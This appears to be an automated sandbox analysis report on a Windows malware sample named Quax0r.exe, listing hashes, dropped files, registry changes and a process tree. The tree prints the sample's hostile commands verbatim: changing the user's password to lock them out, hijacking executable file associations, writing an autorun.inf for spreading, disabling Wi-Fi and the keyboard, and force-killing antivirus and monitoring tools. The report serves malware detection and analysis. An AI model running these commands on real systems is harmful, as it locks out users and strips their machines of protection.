Analysis
- max time kernel: 150s
- max time network: 48s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 01-06-2022 09:10

Static task: static1
Behavioral task: behavioral1
- Sample: Quax0r.exe
- Resource: win7-20220414-en
General
- Target: Quax0r.exe
- Size: 16KB
- MD5: 779b96f25a5c23fb88062503290e69ce
- SHA1: 1d3b85c38418d296ced87fb7155e40aad8cb0773
- SHA256: cd1bb0b84729b272e28a48cdfc22ef1f2577e4a1779a9fe871e54cf71707ded8
- SHA512: 7ac94fb7d832302f0aba124f41e168d00e1b3567ff88b7938c25cfb4dd72539e80b56862abf65be99f800d2dec034dbab56be3d5021175a314beee65def9ce3a
Malware Config
Signatures
- Drops startup file (1 IoCs)
  Processes: Quax0r.exe
  description | ioc | process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | Quax0r.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Drops desktop.ini file(s) (30 IoCs)
  Processes: Quax0r.exe
  description | ioc | process
  File created | C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\Favorites\Links for United States\desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I7JGZPUA\desktop.ini | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI | Quax0r.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\Favorites\desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\Favorites\Links\desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\Music\desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | Quax0r.exe
  File created | C:\Program Files (x86)\desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\Videos\desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2HTZSS82\desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\Desktop\desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\N4DR1BTE\desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\Pictures\desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini | Quax0r.exe
  File created | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D396AG1W\desktop.ini | Quax0r.exe
- Drops autorun.inf file (1 TTPs)
  Malware can abuse Windows Autorun to spread further via attached volumes.
- Drops file in Program Files directory (64 IoCs)
  Processes: Quax0r.exe
  description | ioc | process
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_ON.GIF | Quax0r.exe
  File created | C:\Program Files (x86)\Windows Media Player\es-ES\WMPMediaSharing.dll.mui | Quax0r.exe
  File created | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFFile_8.ico | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic 2.xml | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FEZIP.POC | Quax0r.exe
  File created | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\fr\System.Data.Entity.Resources.dll | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\IPMS.ICO | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\TYPE.WAV | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0292278.WMF | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18196_.WMF | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\TexturedBlue.css | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\SUBMIT.JS | Quax0r.exe
  File created | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\PresentationCore.dll | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107026.WMF | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\AUDIOSEARCHLTS.DLL | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\GostTitle.XSL | Quax0r.exe
  File created | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00669_.WMF | Quax0r.exe
  File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\slideShow.html | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00169_.GIF | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18243_.WMF | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis\HEADER.GIF | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL020.XML | Quax0r.exe
  File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\8.png | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Adobe AIR Application Installer.exe | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\PROOF\MSWDS_EN.LEX | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll | Quax0r.exe
  File created | C:\Program Files (x86)\Common Files\microsoft shared\ink\de-DE\InkObj.dll.mui | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14538_.GIF | Quax0r.exe
  File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_top_left.png | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01462_.WMF | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\WWINTL.DLL.IDX_DLL | Quax0r.exe
  File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\css\flyout.css | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01297_.GIF | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml | Quax0r.exe
  File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\js\settings.js | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00172_.WMF | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02748G.GIF | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\Blog.dotx | Quax0r.exe
  File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full_partly-cloudy.png | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RIPPLE\THMBNAIL.PNG | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00045_.WMF | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01849_.WMF | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\ACEDAO.DLL | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\IPEDINTL.DLL | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\OIS_COL.HXC | Quax0r.exe
  File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\js\library.js | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSOICONS.EXE | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0278702.WMF | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00704_.WMF | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\CLASSIC1.WMF | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\JPEGIM32.FLT | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\PROPLUS\SETUP.XML | Quax0r.exe
  File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Onix32.dll | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0293844.WMF | Quax0r.exe
  File created | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\fr\UIAutomationClientsideProviders.resources.dll | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\IMCONTACT.DLL | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00105_.WMF | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00382_.WMF | Quax0r.exe
  File created | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\System.Web.Entity.dll | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_ja.dll | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG | Quax0r.exe
  File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\BORDERS\MSART12.BDR | Quax0r.exe
- Kills process with taskkill (1 IoCs)
  Processes: taskkill.exe
  pid | process
  1720 | taskkill.exe
- Modifies registry class (6 IoCs)
  Processes: cmd.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.exe | cmd.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "RozbehOfSatanFile " | cmd.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat | cmd.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "RozbehOfSatanFile " | cmd.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd | cmd.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "RozbehOfSatanFile" | cmd.exe
- Runs net.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes: taskkill.exe
  description | pid | process
  Token: SeDebugPrivilege | 1720 | taskkill.exe
- Suspicious use of WriteProcessMemory (40 IoCs)
  Processes: Quax0r.exe, cmd.exe, net.exe, cmd.exe, cmd.exe
  description | pid | process | target process
  PID 1668 wrote to memory of 1328 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 1328 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 1328 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 1328 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 1752 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 1752 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 1752 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 1752 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 1172 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 1172 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 1172 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 1172 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 1444 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 1444 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 1444 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 1444 | 1668 | Quax0r.exe | cmd.exe
  PID 1328 wrote to memory of 1684 | 1328 | cmd.exe | net.exe
  PID 1328 wrote to memory of 1684 | 1328 | cmd.exe | net.exe
  PID 1328 wrote to memory of 1684 | 1328 | cmd.exe | net.exe
  PID 1328 wrote to memory of 1684 | 1328 | cmd.exe | net.exe
  PID 1668 wrote to memory of 1284 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 1284 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 1284 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 1284 | 1668 | Quax0r.exe | cmd.exe
  PID 1684 wrote to memory of 2020 | 1684 | net.exe | net1.exe
  PID 1684 wrote to memory of 2020 | 1684 | net.exe | net1.exe
  PID 1684 wrote to memory of 2020 | 1684 | net.exe | net1.exe
  PID 1684 wrote to memory of 2020 | 1684 | net.exe | net1.exe
  PID 1668 wrote to memory of 360 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 360 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 360 | 1668 | Quax0r.exe | cmd.exe
  PID 1668 wrote to memory of 360 | 1668 | Quax0r.exe | cmd.exe
  PID 1284 wrote to memory of 1612 | 1284 | cmd.exe | netsh.exe
  PID 1284 wrote to memory of 1612 | 1284 | cmd.exe | netsh.exe
  PID 1284 wrote to memory of 1612 | 1284 | cmd.exe | netsh.exe
  PID 1284 wrote to memory of 1612 | 1284 | cmd.exe | netsh.exe
  PID 360 wrote to memory of 1720 | 360 | cmd.exe | taskkill.exe
  PID 360 wrote to memory of 1720 | 360 | cmd.exe | taskkill.exe
  PID 360 wrote to memory of 1720 | 360 | cmd.exe | taskkill.exe
  PID 360 wrote to memory of 1720 | 360 | cmd.exe | taskkill.exe
Processes
- [1] C:\Users\Admin\AppData\Local\Temp\Quax0r.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Quax0r.exe"
  Signatures: Drops startup file; Drops desktop.ini file(s); Drops file in Program Files directory; Suspicious use of WriteProcessMemory
  - [2] C:\Windows\SysWOW64\cmd.exe
    Command line: cmd.exe /c net users %username% LOCKEDBYROZBEHOFSATAN
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\net.exe
      Command line: net users Admin LOCKEDBYROZBEHOFSATAN
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\SysWOW64\net1.exe
        Command line: C:\Windows\system32\net1 users Admin LOCKEDBYROZBEHOFSATAN
  - [2] C:\Windows\SysWOW64\cmd.exe
    Command line: cmd.exe /c assoc .exe=RozbehOfSatanFile && assoc .bat=RozbehOfSatanFile && assoc .cmd=RozbehOfSatanFile
    Signatures: Modifies registry class
  - [2] C:\Windows\SysWOW64\cmd.exe
    Command line: cmd.exe /c echo ^[autorun^] > ..\\autorun.inf
  - [2] C:\Windows\SysWOW64\cmd.exe
    Command line: cmd.exe /c echo open^=WindowsScan^.exe >> ..\\autorun.inf
  - [2] C:\Windows\SysWOW64\cmd.exe
    Command line: cmd.exe /c netsh Interface Set Interface Wi-Fi 12 disable
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\netsh.exe
      Command line: netsh Interface Set Interface Wi-Fi 12 disable
  - [2] C:\Windows\SysWOW64\cmd.exe
    Command line: cmd.exe /c taskkill /im chrome.exe /f && taskkill /im WireShark.exe /f && taskkill /im MSASCUI.exe /f && taskkill /im taskmgr.exe /f && taskkill /im regedit.exe /f && taskkill /im Kaspersky.exe /f && taskkill /im msseces.exe /f && taskkill /im nod32.exe /f && taskkill /im msmpeng.exe /f && taskkill /im navapsvc.exe /f && taskkill /im avkwctl.exe /f && taskkill /im fsav32.exe /f && rundll32 keyboard,disable
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im chrome.exe /f
      Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\autorun.inf
  Filesize: 35B
  MD5: 261490e22651f58aeb72b82b148f1e02
  SHA1: f180054e9592561288db216c9fb156a99ad5830f
  SHA256: b12b5eb5be8ef735ed43076e438f438a34adf362a27b187aeba422a4e831b4ba
  SHA512: 83edf93509d5cc5f275c5877bcf571cf5a8716df603783155bb88338008d409ff5041dfb040253c400750e000e51c9eb8c26cb714cd06186ab9b00fc44b2769c
- memory/360-69-0x0000000000000000-mapping.dmp
- memory/1172-60-0x0000000000000000-mapping.dmp
- memory/1284-66-0x0000000000000000-mapping.dmp
- memory/1328-58-0x0000000000000000-mapping.dmp
- memory/1444-61-0x0000000000000000-mapping.dmp
- memory/1612-71-0x0000000000000000-mapping.dmp
- memory/1668-73-0x0000000071040000-0x0000000071D5D000-memory.dmp
  Filesize: 13.1MB
- memory/1668-76-0x0000000070800000-0x0000000070F3E000-memory.dmp
  Filesize: 7.2MB
- memory/1668-64-0x00000000741A0000-0x0000000074980000-memory.dmp
  Filesize: 7.9MB
- memory/1668-79-0x0000000071F00000-0x00000000720D1000-memory.dmp
  Filesize: 1.8MB
- memory/1668-67-0x0000000071F00000-0x00000000720D1000-memory.dmp
  Filesize: 1.8MB
- memory/1668-78-0x0000000072AF0000-0x0000000073E7F000-memory.dmp
  Filesize: 19.6MB
- memory/1668-57-0x00000000720E0000-0x0000000072AF0000-memory.dmp
  Filesize: 10.1MB
- memory/1668-56-0x0000000072AF0000-0x0000000073E7F000-memory.dmp
  Filesize: 19.6MB
- memory/1668-70-0x0000000071D60000-0x0000000071EF4000-memory.dmp
  Filesize: 1.6MB
- memory/1668-55-0x00000000762C1000-0x00000000762C3000-memory.dmp
  Filesize: 8KB
- memory/1668-77-0x00000000706A0000-0x0000000070769000-memory.dmp
  Filesize: 804KB
- memory/1668-54-0x0000000001130000-0x000000000113C000-memory.dmp
  Filesize: 48KB
- memory/1668-74-0x0000000070F40000-0x000000007103C000-memory.dmp
  Filesize: 1008KB
- memory/1684-63-0x0000000000000000-mapping.dmp
- memory/1720-72-0x0000000000000000-mapping.dmp
- memory/1752-59-0x0000000000000000-mapping.dmp
- memory/2020-68-0x0000000000000000-mapping.dmp